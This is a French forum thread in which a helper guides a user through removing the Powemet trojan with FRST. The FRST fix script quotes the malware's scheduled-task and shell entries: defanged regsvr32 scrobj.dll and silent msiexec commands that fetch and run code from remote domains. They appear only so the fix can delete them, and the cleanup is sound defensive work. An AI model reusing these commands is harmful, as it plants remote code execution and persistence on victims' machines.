Trojan:Win32/Powemet.A!attk
Résolu
Srrr
Messages postés
38
Statut
Membre
-
Srrr Messages postés 38 Statut Membre -
Srrr Messages postés 38 Statut Membre -
Bonsoir,
Windows defender me signal un virus qui se redémarre tout de suite une fois supprimé il s'agit de Trojan:Win32/Powemet.A!attk. Et ce depuis bientôt 1 mois. Celui-ci m'inquiète car il est présenté comme grave d'après Windows defender.
Pour l'instant je n'ai rien eu d'inquiétant lors de mon utilisation habituel, même si je sais que l'action d'un virus ne se voit pas tout le temps.
Merci d'avance pour vos réponse quant au moyen de stopper ce virus bonne nuit.
Windows defender me signal un virus qui se redémarre tout de suite une fois supprimé il s'agit de Trojan:Win32/Powemet.A!attk. Et ce depuis bientôt 1 mois. Celui-ci m'inquiète car il est présenté comme grave d'après Windows defender.
Pour l'instant je n'ai rien eu d'inquiétant lors de mon utilisation habituel, même si je sais que l'action d'un virus ne se voit pas tout le temps.
Merci d'avance pour vos réponse quant au moyen de stopper ce virus bonne nuit.
A voir également:
- Win32/powemotet
- Trojan remover - Télécharger - Antivirus & Antimalwares
- Trojan agent ✓ - Forum Virus
- Trojan b901 system32 win config 34 ✓ - Forum Virus
- Csrss.exe trojan ✓ - Forum Virus
- [Virus] Trojan ou virus dans csrss.exe et spo - Forum Virus
12 réponses
Salut,
Pour vérifier l'ordinateur, je t'invite à faire cette analyse FRST et donner les rapports en retour :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.
Trois rapports FRST seront générés :
Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ afin de les partager.
En retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Pour vérifier l'ordinateur, je t'invite à faire cette analyse FRST et donner les rapports en retour :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.
Trois rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ afin de les partager.
En retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Voici les lien des 3 rapports :
FRST https://pjjoint.malekal.com/files.php?id=FRST_20180820_w12c12m9c8s5
Addition https://pjjoint.malekal.com/files.php?id=20180820_n13f12n14c7i11
Shortcut https://pjjoint.malekal.com/files.php?id=20180820_x5x5y13l12j14
FRST https://pjjoint.malekal.com/files.php?id=FRST_20180820_w12c12m9c8s5
Addition https://pjjoint.malekal.com/files.php?id=20180820_n13f12n14c7i11
Shortcut https://pjjoint.malekal.com/files.php?id=20180820_x5x5y13l12j14
Tu as des programmes qui ont été installés à l'achat de l'ordinateur ou installés par la suite et qui sont pas forcément utiles.
Ils encombrent Windows et peuvent le ralentir.
Tu peux donc les désinstaller.
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :
CyberLink
Reimage Repair(arnaque)
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Ils encombrent Windows et peuvent le ralentir.
Tu peux donc les désinstaller.
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :
CyberLink
Reimage Repair(arnaque)
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
CreateRestorePoint:
CloseProcesses:
2018-08-16 00:16 - 2018-05-21 14:56 - 000000000 ____D C:\ProgramData\Reimage Protector
Task: {57FF6293-4749-4112-9579-398948198854} - System32\Tasks\Windows-WoShiBeiYongDe => regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj85OTJYFUVXNWJXOTLSMWYxRjY3FUM1NTLSNUQWOTF5MH== scrobj.dll <==== ATTENTION
Task: {5899DDCC-9835-4932-AB36-0ED554C5349B} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2018-04-25] (Reimage®) <==== ATTENTION
HKU\S-1-5-21-1377529002-2413682301-2725971039-1001\...\Run: [Free Download Manager] => C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\fdm.exe [10162176 2018-05-11] (FreeDownloadManager.org)
HKU\S-1-5-21-1377529002-2413682301-2725971039-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj85OTJYFUVXNWJXOTLSMWYxRjY3FUM1NTLSNUQWOTF5MH== /q <==== ATTENTION [Country : US - 54.72.9.51]
Task: {7971DA76-8C10-438F-9CBD-346E2479BB7F} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj85OTJYFUVXNWJXOTLSMWYxRjY3FUM1NTLSNUQWOTF5MH== scrobj.dll <==== ATTENTION
RemoveProxy:
Reboot:
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Voici le lien du fichier texte :
https://pjjoint.malekal.com/files.php?id=20180824_c10i15p13n8y7
J'ai réalisé cette manipulation mardi et le virus a disparu pendant 3 jours puis windows defender l'a redetecté.
Pourquoi le logiciel "free dowload manager" a été supprimé?
https://pjjoint.malekal.com/files.php?id=20180824_c10i15p13n8y7
J'ai réalisé cette manipulation mardi et le virus a disparu pendant 3 jours puis windows defender l'a redetecté.
Pourquoi le logiciel "free dowload manager" a été supprimé?
Parce que la correction FRST n'a pas fonctionné.
Il y a des retours à la ligne anormale dans les données que j'ai données.
Tu as dû passer par Word ou je sais pas trop.
A refaire en suivant les instructions.
Il y a des retours à la ligne anormale dans les données que j'ai données.
Tu as dû passer par Word ou je sais pas trop.
A refaire en suivant les instructions.
Voici le lien du Comptes-rendus de Malwarebytes :
https://pjjoint.malekal.com/files.php?id=20180825_l14c9c9w15p9
J'ai mis ces menaces en quarantaine.
https://pjjoint.malekal.com/files.php?id=20180825_l14c9c9w15p9
J'ai mis ces menaces en quarantaine.
